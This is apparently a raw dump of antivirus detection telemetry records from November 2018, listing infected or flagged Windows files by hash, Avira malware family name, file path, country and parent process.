  Row(detection=Row(filename='fdd33eb1e444763fcc585701992085e9fab6dd6a767d150ffa2f70c293320e2a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FDD33EB1E444763FCC585701992085E9FAB6DD6A767D150FFA2F70C293320E2A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fdd33eb1e444763fcc585701992085e9fab6dd6a767d150ffa2f70c293320e2a', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:29:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fe324a1b076f47329126769fcb324957af0b28ed539d864d4cf71f8a80b6ff87', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FE324A1B076F47329126769FCB324957AF0B28ED539D864D4CF71F8A80B6FF87', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fe324a1b076f47329126769fcb324957af0b28ed539d864d4cf71f8a80b6ff87', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:29:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='skimmed.exe', filepath='C:\\Program Files (x86)\\Skimmed\\Skimmed.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='fe338852318a1a17e233f197095e502a5bfcf013d3170ba8aba2fecec0115dd9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:sFTRkviRGkWQmP0l.1', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T11:55:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spittoon.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Skimmed\\spittoon.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='fe338852318a1a17e233f197095e502a5bfcf013d3170ba8aba2fecec0115dd9', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:08:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='containerized.exe', filepath='C:\\Windows\\containerized.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='fe338852318a1a17e233f197095e502a5bfcf013d3170ba8aba2fecec0115dd9', metadata=Row(cmdline='\\\\\\/SkipUac', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\ASC.exe', parentsize=8227088, timestamp='2018-11-01T12:57:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-075943-07f6b62a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6485ed3c\\AVSCAN-20181101-075913-048B6E52\\AVSCAN-20181101-075943-07F6B62A', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='fe338852318a1a17e233f197095e502a5bfcf013d3170ba8aba2fecec0115dd9', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:59:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='skimmed.exe', filepath='C:\\Program Files (x86)\\Skimmed\\Skimmed.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='fe338852318a1a17e233f197095e502a5bfcf013d3170ba8aba2fecec0115dd9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:sFTRkviRGkWQmP0l.1', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T11:55:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epsdneul.exe', filepath='D:\\SERVER_BENGKEL\\1.ADMBENG\\EPSON\\_cdres\\_exe\\Install Navigator\\EPSDNEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='fe57d2435a26d4a86188dc8b7caf402d0cbbdc584abfc6bfea36e7de89e4c172', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:39:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epsdneul.exe', filepath='D:\\SERVER_BENGKEL\\1.ADMBENG\\EPSON\\_cdres\\_exe\\Install Navigator\\EPSDNEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='fe57d2435a26d4a86188dc8b7caf402d0cbbdc584abfc6bfea36e7de89e4c172', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:09:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e27c71186eac9e81f01dd027ba1509bb228ecc9a', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\e27c71186eac9e81f01dd027ba1509bb228ecc9a', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='fe5b3f7cfcafd5a25e824e21ebdb09f651a5fb264572a20c080da4293a79e2bf', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:09:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='019 - potato [circle].exe', filepath='E:\\music\\music\\Vampires 652 P\\019 - POTATO [CIRCLE]\\019 - POTATO [CIRCLE].exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='fe98caeaf0e682cbe9e1cb945c22c78d2cd383a00682132a29c503bde28c8401', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:13:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spideypc.exe', filepath='\\\\?\\H:\\العاب\\اسبيدر مان\\SpideyPC.exe', filesize=1536000, name='TR/Patched.Gen.#M300.#R3367'), hash='fe9cbee1d403ebb36d0cd09269e02b18f88413538742cec93c5183af6895ab84', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174811-1fa8a5bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0845e96a\\AVSCAN-20181101-174645-0FEFE8A3\\AVSCAN-20181101-174811-1FA8A5BB', filesize=660000, name='PUA/MediaGet.Gen5.#M300.#R400493'), hash='fefefd774d1ba5efc46a0f4273ef0265b4f8460f63f7bffd10b366b368de38eb', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:48:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174803-1e271f4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0845e96a\\AVSCAN-20181101-174645-0FEFE8A3\\AVSCAN-20181101-174803-1E271F4F', filesize=660000, name='PUA/MediaGet.Gen5.#M300.#R400493'), hash='fefefd774d1ba5efc46a0f4273ef0265b4f8460f63f7bffd10b366b368de38eb', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:48:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174818-20d3d8d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0845e96a\\AVSCAN-20181101-174645-0FEFE8A3\\AVSCAN-20181101-174818-20D3D8D4', filesize=660000, name='PUA/MediaGet.Gen5.#M300.#R400493'), hash='fefefd774d1ba5efc46a0f4273ef0265b4f8460f63f7bffd10b366b368de38eb', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:48:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\Drivers Rodolfo\\Intel Chipsets driver\\Setup.exe', filesize=1024000, name='W32/Stanit.#M1.#R1'), hash='ff15b60196808f4c4d4aff891a80adc14e3dc06a6600d8cae379923f187ab05b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:05:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kact2.exe', filepath='D:\\Mihaela (my documents)\\Kx602212_UPD_Signed_en\\64bit\\XP and newer\\KACT2\\KACT2.exe', filesize=1024000, name='W32/Sality.Y.#M1.#R1'), hash='ff1eb69e5c74f8d29ec9821f227c2bfa0187ca74115d3bfb3ebccd0aa70f0539', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ff686ddb38ece86bc825e748d0468f3a1518cf8a9d10c9c2bb56d87effd76329', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FF686DDB38ECE86BC825E748D0468F3A1518CF8A9D10C9C2BB56D87EFFD76329', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ff686ddb38ece86bc825e748d0468f3a1518cf8a9d10c9c2bb56d87effd76329', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:50:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\SAP\\SAP Business One Server\\B1_SHR\\Client.x64\\SAP B1ClientAgent Installation\\setup.exe', filesize=1280000, name='W32/Infector.Gen.#M300.#R7863'), hash='ff72ff3984374c01058a97ea1d34dc8c32e4f54a4100f635b924adb7a4a38aa0', metadata=Row(cmdline='invagent.dll,RunUpdate -noappraiser', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T05:23:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='btxml.exe', filepath='D:\\電商部\\exe\\BTXML.exe', filesize=896000, name='TR/Dldr.Delphi.Gen.#M300.#R2190'), hash='ff899ccbd07e8062a5922ef2a6561afbff64400a36726c288aa37b93eb84044c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:30:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-224629-58fcf191', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9ed3a19d\\AVSCAN-20181101-224555-52C16CEA\\AVSCAN-20181101-224629-58FCF191', filesize=192000, name='TR/Black.Gen2.#M1.#R1'), hash='fff0bae1269aaf7bf1db339362c218ba9a2a9512b06a583eb281fd59858bead7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:46:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193505-c2a17318', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7bc871c5\\AVSCAN-20181101-193316-AF127610\\AVSCAN-20181101-193505-C2A17318', filesize=192000, name='TR/Black.Gen2.#M1.#R1'), hash='fff0bae1269aaf7bf1db339362c218ba9a2a9512b06a583eb281fd59858bead7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msvcrmtk.dll', filepath='E:\\PACM00_11_A.11_180410_a7d06fc5\\刷机工具\\刷机工具\\刷机工具\\msvcrmtk.dll', filesize=192000, name='TR/Black.Gen2.#M300.#R100338'), hash='fff0bae1269aaf7bf1db339362c218ba9a2a9512b06a583eb281fd59858bead7', metadata=Row(cmdline='\\\\\\/elevated \\\\\\/regrun', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Tencent\\QQPCMgr\\12.14.19590.218\\QQPCTray.exe', parentsize=357752, timestamp='2018-11-01T14:44:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msvcrmtk.dll', filepath='E:\\PACM00_11_A.11_180410_A7D06FC5\\1111\\刷机工具\\MSVCRMTK.DLL', filesize=192000, name='TR/Black.Gen2.#M300.#R100338'), hash='fff0bae1269aaf7bf1db339362c218ba9a2a9512b06a583eb281fd59858bead7', metadata=Row(cmdline='-r', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Tencent\\QQPCMgr\\12.14.19590.218\\QQPCRTP.exe', parentsize=307152, timestamp='2018-11-01T11:29:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msvcrmtk.dll', filepath='E:\\PACM00_11_A.11_180410_A7D06FC5\\1111\\刷机工具\\MSVCRMTK.DLL', filesize=192000, name='TR/Black.Gen2.#M300.#R100338'), hash='fff0bae1269aaf7bf1db339362c218ba9a2a9512b06a583eb281fd59858bead7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:29:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130822-6c10ede9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d438d77\\AVSCAN-20181101-130545-537131FB\\AVSCAN-20181101-130822-6C10EDE9', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202750-93df0c79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_94372a8a\\AVSCAN-20181101-202422-6FB24097\\AVSCAN-20181101-202750-93DF0C79', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182702-7b44014a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_732a2416\\AVSCAN-20181101-181636-14C56F4A\\AVSCAN-20181101-182702-7B44014A', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:28:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131134-8a334c55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d438d77\\AVSCAN-20181101-130545-537131FB\\AVSCAN-20181101-131134-8A334C55', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:11:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130657-5ebb0dde', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d438d77\\AVSCAN-20181101-130545-537131FB\\AVSCAN-20181101-130657-5EBB0DDE', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:07:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='atube_catcher.exe', filepath='C:\\Users\\X\\Downloads\\aTube_Catcher.exe', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:01:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='atube_catcher_atu3_9000.exe', filepath='C:\\Users\\X\\Downloads\\aTube_Catcher_ATU3_9000.exe', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182905-8f83ea9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_732a2416\\AVSCAN-20181101-181636-14C56F4A\\AVSCAN-20181101-182905-8F83EA9F', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:30:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='360fsflt.sys', filepath='C:\\Program Files (x86)\\360\\360Safe\\deepscan\\360FsFlt.sys', filesize=444000, name='TR/Rootkit.Gen.#M300.#R3885'), hash='f47a1363c4838fe1adf19353ffe24ea8a53a377ed976e562d1683e4371cd43eb', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:53:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='360fsflt.sys', filepath='D:\\Program Files (x86)\\360\\360Safe\\deepscan\\360FsFlt.sys', filesize=444000, name='TR/Rootkit.Gen.#M300.#R3885'), hash='f47a1363c4838fe1adf19353ffe24ea8a53a377ed976e562d1683e4371cd43eb', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:26:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='360fsflt.sys', filepath='C:\\Users\\X\\Desktop\\360\\360Safe\\deepscan\\360FsFlt.sys', filesize=444000, name='TR/Rootkit.Gen.#M300.#R3885'), hash='f47a1363c4838fe1adf19353ffe24ea8a53a377ed976e562d1683e4371cd43eb', metadata=Row(cmdline=None, country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:53:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f4b808f543ea5f7cdc9bd73eed5b6b80a1eed6d176305b3e6f6538aa53744b31', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F4B808F543EA5F7CDC9BD73EED5B6B80A1EED6D176305B3E6F6538AA53744B31', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f4b808f543ea5f7cdc9bd73eed5b6b80a1eed6d176305b3e6f6538aa53744b31', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='46889.html', filepath='D:\\云赚打码\\cache\\businessidresultpage\\5237314121408\\46889.html', filesize=264000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='f4ea2537d8e8cdab8a4c4b50d3e1f970ff9b2373a4225ba9e08ef7837ffede06', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Program Files\\360se6\\Application\\360se.exe', parentsize=1190472, timestamp='2018-11-01T01:26:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zlib.dll', filepath='D:\\العاب\\Mortal kombat 5\\Jewel Quest\\zlib.dll', filesize=236000, name='W32/Ramnit.C.#M1.#R1'), hash='f524a35e2a79d61f93412fbeba6d77758815b4a89d1dce5c778e12c4823bd743', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:05:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zlib.dll', filepath='D:\\العاب\\Mortal kombat 5\\Jewel Quest\\zlib.dll', filesize=236000, name='W32/Ramnit.C.#M1.#R1'), hash='f524a35e2a79d61f93412fbeba6d77758815b4a89d1dce5c778e12c4823bd743', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:39:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f55526324e6d6eb210c0cd464baf28bc7f4127b84debc2fcd918c86eec0be458', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F55526324E6D6EB210C0CD464BAF28BC7F4127B84DEBC2FCD918C86EEC0BE458', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f55526324e6d6eb210c0cd464baf28bc7f4127b84debc2fcd918c86eec0be458', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:51:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='network_driver_4fw6k_wn_15.10.0.10_a03.exe', filepath='\\\\?\\E:\\Programs\\Compressed\\all drivers for dell Latitude E6510\\win7 32 & 64bit\\Network_Driver_4FW6K_WN_15.10.0.10_A03.EXE', filesize=130688000, name='TR/Patched.Gen.#M300.#R3374'), hash='f56a8ebc78bfd60f2e56eeafc5e0628888734e2a06538363267370f4af4b2e65', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:04:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='network_driver_4fw6k_wn_15.10.0.10_a03.exe', filepath='E:\\Programs\\Compressed\\all drivers for dell Latitude E6510\\win7 32 & 64bit\\Network_Driver_4FW6K_WN_15.10.0.10_A03.EXE', filesize=130688000, name='TR/Patched.Gen.#M300.#R3374'), hash='f56a8ebc78bfd60f2e56eeafc5e0628888734e2a06538363267370f4af4b2e65', metadata=Row(cmdline='\\\\\\/Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=7168, timestamp='2018-11-01T15:24:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='network_driver_4fw6k_wn_15.10.0.10_a03.exe', filepath='E:\\Programs\\Compressed\\all drivers for dell Latitude E6510\\win7 32 & 64bit\\Network_Driver_4FW6K_WN_15.10.0.10_A03.EXE', filesize=130688000, name='TR/Patched.Gen.#M300.#R3374'), hash='f56a8ebc78bfd60f2e56eeafc5e0628888734e2a06538363267370f4af4b2e65', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T15:51:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091212-124f05ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ab2dd11\\AVSCAN-20181101-091141-0DC7349A\\AVSCAN-20181101-091212-124F05ED', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='f5712cd3636de516c2f73ce05ffdd34b663dcb28fa2a0e85d275d83d09e29f8c', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:12:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091326-1d0b64cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ab2dd11\\AVSCAN-20181101-091141-0DC7349A\\AVSCAN-20181101-091326-1D0B64CF', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='f5712cd3636de516c2f73ce05ffdd34b663dcb28fa2a0e85d275d83d09e29f8c', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8муз.exe', filepath='E:\\муз\\8муз.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='f5712cd3636de516c2f73ce05ffdd34b663dcb28fa2a0e85d275d83d09e29f8c', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T06:11:00Z'), dt=datetime.date(2018, 11, 1)),
